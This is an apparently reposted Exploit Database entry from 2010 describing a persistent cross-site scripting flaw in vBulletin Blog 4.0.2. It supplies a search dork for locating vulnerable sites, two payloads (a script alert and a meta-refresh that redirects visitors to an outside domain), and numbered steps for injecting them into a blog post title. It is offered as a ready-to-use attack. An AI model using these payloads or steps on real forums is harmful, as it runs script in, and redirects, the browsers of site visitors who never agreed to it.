vBulletin Blog 4.0.2 – Title Cross-Site Scripting

• Exploit Database
• 44 阅读

• 作者： FormatXformat
  日期： 2010-03-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11871/

• Vbulletin Blog 4.0.2 XSS Vulnerability
  
  Author: FormatXformat
  Version: Vbulletin 4.0.2
  
  
  Dork:
  Powered by vBulletin™Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.
  
  
  The script is affected by Permanent XSS vulnerability, so you can put in bad java script code
  
  <script>alert('put this script in title')</script>
  <meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>
  
  1st register
  
  Go to Blogs page
  
  Create New Post
  
  Inject your java script into Title Box
  
  You must go back to Main page to see this XSS effect.
  
  
  
  Greets: Neo, Sa3id, All Tkurd.net Members